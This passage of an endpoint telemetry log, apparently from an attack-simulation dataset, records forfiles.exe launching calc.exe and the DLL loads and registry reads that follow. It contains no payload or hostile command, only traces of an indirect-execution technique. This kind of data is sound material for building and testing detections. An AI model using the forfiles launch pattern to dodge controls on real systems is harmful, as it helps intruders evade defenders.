131883574021160000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010F78D5701}" - }, - { - "event_type": "image_load", - "image_name": "bcryptprimitives.dll", - "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", - "pid": 4500, - "process_name": "forfiles.exe", - "process_path": "C:\\Windows\\System32\\forfiles.exe", - "timestamp": 131883574021160000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010F78D5701}" - }, - { - "event_type": "image_load", - "image_name": "imm32.dll", - "image_path": "C:\\Windows\\System32\\imm32.dll", - "pid": 4500, - "process_name": "forfiles.exe", - "process_path": 
"C:\\Windows\\System32\\forfiles.exe", - "timestamp": 131883574021160000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010F78D5701}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\calc.exe\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "forfiles.exe", - "parent_process_path": "C:\\Windows\\System32\\forfiles.exe", - "pid": 2616, - "ppid": 4500, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "subtype": "create", - "timestamp": 131883574021320000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}", - "unique_ppid": "{42FC7E13-CC1A-5C05-0000-0010F78D5701}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "calc.exe", - "image_path": "C:\\Windows\\System32\\calc.exe", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574021260000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574021260000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574021340000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574021340000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - 
"event_type": "image_load", - "image_name": "shell32.dll", - "image_path": "C:\\Windows\\System32\\shell32.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574021340000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574021340000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "cfgmgr32.dll", - "image_path": "C:\\Windows\\System32\\cfgmgr32.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574021340000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "ucrtbase.dll", - "image_path": "C:\\Windows\\System32\\ucrtbase.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574021340000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "SHCore.dll", - "image_path": "C:\\Windows\\System32\\SHCore.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574021340000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574021340000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "combase.dll", - "image_path": "C:\\Windows\\System32\\combase.dll", - 
"pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574021340000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "bcryptprimitives.dll", - "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574021340000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "windows.storage.dll", - "image_path": "C:\\Windows\\System32\\windows.storage.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574021340000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574021340000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574021340000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "shlwapi.dll", - "image_path": "C:\\Windows\\System32\\shlwapi.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574021340000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "gdi32.dll", - "image_path": "C:\\Windows\\System32\\gdi32.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": 
"C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574021340000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "gdi32full.dll", - "image_path": "C:\\Windows\\System32\\gdi32full.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574021340000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "msvcp_win.dll", - "image_path": "C:\\Windows\\System32\\msvcp_win.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574021340000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "user32.dll", - "image_path": "C:\\Windows\\System32\\user32.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574021340000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "win32u.dll", - "image_path": "C:\\Windows\\System32\\win32u.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574021340000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "kernel.appcore.dll", - "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574021340000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "profapi.dll", - "image_path": "C:\\Windows\\System32\\profapi.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574021439984, - "unique_pid": 
"{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "powrprof.dll", - "image_path": "C:\\Windows\\System32\\powrprof.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574021439984, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "fltLib.dll", - "image_path": "C:\\Windows\\System32\\fltLib.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574021439984, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "imm32.dll", - "image_path": "C:\\Windows\\System32\\imm32.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574021439984, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "ole32.dll", - "image_path": "C:\\Windows\\System32\\ole32.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574021520000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "uxtheme.dll", - "image_path": "C:\\Windows\\System32\\uxtheme.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574021520000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "propsys.dll", - "image_path": "C:\\Windows\\System32\\propsys.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574021520000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "oleaut32.dll", - 
"image_path": "C:\\Windows\\System32\\oleaut32.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574021520000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "clbcatq.dll", - "image_path": "C:\\Windows\\System32\\clbcatq.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574021700000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "OneCoreUAPCommonProxyStub.dll", - "image_path": "C:\\Windows\\System32\\OneCoreUAPCommonProxyStub.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574021700000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "registry", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\WINDOWS\\system32\\calc.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace", - "registry_value": "NameSpace", - "timestamp": 131883574021700000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "registry", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\WINDOWS\\system32\\calc.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace", - "registry_value": "NameSpace", - "timestamp": 131883574021700000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "registry", - "pid": 2616, - "process_name": "calc.exe", - 
"process_path": "C:\\WINDOWS\\system32\\calc.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace\\DelegateFolders", - "registry_value": "DelegateFolders", - "timestamp": 131883574021700000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "urlmon.dll", - "image_path": "C:\\Windows\\System32\\urlmon.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574021700000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "iertutil.dll", - "image_path": "C:\\Windows\\System32\\iertutil.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574021700000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "cryptbase.dll", - "image_path": "C:\\Windows\\System32\\cryptbase.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574021790016, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "registry", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\WINDOWS\\system32\\calc.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883574021790016, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "ieframe.dll", - "image_path": "C:\\Windows\\System32\\ieframe.dll", - "pid": 
2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574021790016, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "netapi32.dll", - "image_path": "C:\\Windows\\System32\\netapi32.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574021790016, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "version.dll", - "image_path": "C:\\Windows\\System32\\version.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574021790016, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "winhttp.dll", - "image_path": "C:\\Windows\\System32\\winhttp.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574021790016, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "wkscli.dll", - "image_path": "C:\\Windows\\System32\\wkscli.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574021790016, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "bcrypt.dll", - "image_path": "C:\\Windows\\System32\\bcrypt.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574021790016, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "netutils.dll", - "image_path": "C:\\Windows\\System32\\netutils.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 
131883574021790016, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "comctl32.dll", - "image_path": "C:\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.441_none_fb3e9b173068fb23\\comctl32.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574021880000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "edputil.dll", - "image_path": "C:\\Windows\\System32\\edputil.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574021880000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "secur32.dll", - "image_path": "C:\\Windows\\System32\\secur32.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574021970000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "sspicli.dll", - "image_path": "C:\\Windows\\System32\\sspicli.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574021970000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "mlang.dll", - "image_path": "C:\\Windows\\System32\\mlang.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574021970000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "wininet.dll", - "image_path": "C:\\Windows\\System32\\wininet.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574021970000, - 
"unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "registry", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\WINDOWS\\system32\\calc.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Content", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Content\\CachePrefix", - "registry_value": "CachePrefix", - "timestamp": 131883574021970000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "registry", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\WINDOWS\\system32\\calc.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Cookies", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Cookies\\CachePrefix", - "registry_value": "CachePrefix", - "timestamp": 131883574021970000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "registry", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\WINDOWS\\system32\\calc.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\History", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\History\\CachePrefix", - "registry_value": "CachePrefix", - "timestamp": 131883574021970000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "Windows.UI.AppDefaults.dll", - "image_path": "C:\\Windows\\System32\\Windows.UI.AppDefaults.dll", - "pid": 2616, 
- "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574022060000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "registry", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\WINDOWS\\system32\\calc.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationAssociationToasts", - "registry_value": "ApplicationAssociationToasts", - "timestamp": 131883574022060000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "policymanager.dll", - "image_path": "C:\\Windows\\System32\\policymanager.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574022060000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "msvcp110_win.dll", - "image_path": "C:\\Windows\\System32\\msvcp110_win.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574022060000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "apphelp.dll", - "image_path": "C:\\Windows\\System32\\apphelp.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574022060000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "twinui.dll", - "image_path": "C:\\Windows\\System32\\twinui.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574022150000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - 
}, - { - "event_type": "image_load", - "image_name": "WinTypes.dll", - "image_path": "C:\\Windows\\System32\\WinTypes.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574022150000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "dwmapi.dll", - "image_path": "C:\\Windows\\System32\\dwmapi.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574022150000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "twinui.appcore.dll", - "image_path": "C:\\Windows\\System32\\twinui.appcore.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574022180000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "CoreUIComponents.dll", - "image_path": "C:\\Windows\\System32\\CoreUIComponents.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574022180000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "CoreMessaging.dll", - "image_path": "C:\\Windows\\System32\\CoreMessaging.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574022180000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "ntmarta.dll", - "image_path": "C:\\Windows\\System32\\ntmarta.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574022180000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": 
"sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing", - "registry_value": "WindowSizing", - "timestamp": 131883574022330000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883574022330000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing", - "registry_value": "WindowSizing", - "timestamp": 131883574022330000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": 
"Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883574022330000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 7276, - "process_name": "Calculator.exe", - "process_path": "C:\\Program Files\\WindowsApps\\Microsoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe\\Calculator.exe", - "registry_key": "\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}", - "registry_path": "\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}\\LocalState", - "registry_value": "LocalState", - "timestamp": 131883574022420000, - "unique_pid": "{42FC7E13-C6C3-5C05-0000-00109DB64001}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\WindowSizing", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\WindowSizing\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883574022420000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\WindowSizing\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\WindowSizing\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\PreferredLaunchWindowingMode", - "registry_value": "PreferredLaunchWindowingMode", - "timestamp": 131883574022420000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - 
